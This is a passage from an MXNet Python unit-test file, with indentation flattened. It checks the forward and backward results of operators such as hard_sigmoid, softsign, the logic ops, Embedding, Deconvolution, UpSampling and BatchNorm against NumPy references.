ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z._simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar._simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar._simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y._simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed._simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test._bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test._bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv._bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv._bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv._bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y._simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@pytest.mark.parametrize('op_name', ['BatchNorm', 'SyncBatchNorm'])
@pytest.mark.parametrize('shape', [(4, 2), (4, 3, 4),
(4, 6, 4, 5), (4, 5, 6, 4, 5)])
@pytest.mark.parametrize('fix_gamma', [False, True])
@pytest.mark.parametrize('cudnn_off', [False, True])
@pytest.mark.parametrize('output_mean_var', [False, True])
def test_batchnorm(op_name, shape, fix_gamma, cudnn_off, output_mean_var):
if op_name == 'BatchNorm':
op = mx.nd.BatchNorm
elif op_name == 'SyncBatchNorm':
op = mx.nd.contrib.SyncBatchNorm
else:
raise ValueError(f'Not supported {op_name}')
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req):
kwargs = dict(output_mean_var=output_mean_var)
if op_name == 'SyncBatchNorm':
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
if not fix_gamma:
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad(grad_req=gamma_grad_req)
else:
bn_gamma = mx.nd.ones(shape=(nch,))
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad(grad_req=beta_grad_req)
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
adX, adW, adb = 0, 0, 0
is_train = data_grad_req != 'null' or \
(not fix_gamma and gamma_grad_req != 'null') or \
beta_grad_req != 'null'
for _ in range(num_iters):
if data_grad_req != 'add':
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=fix_gamma, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
if is_train:
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
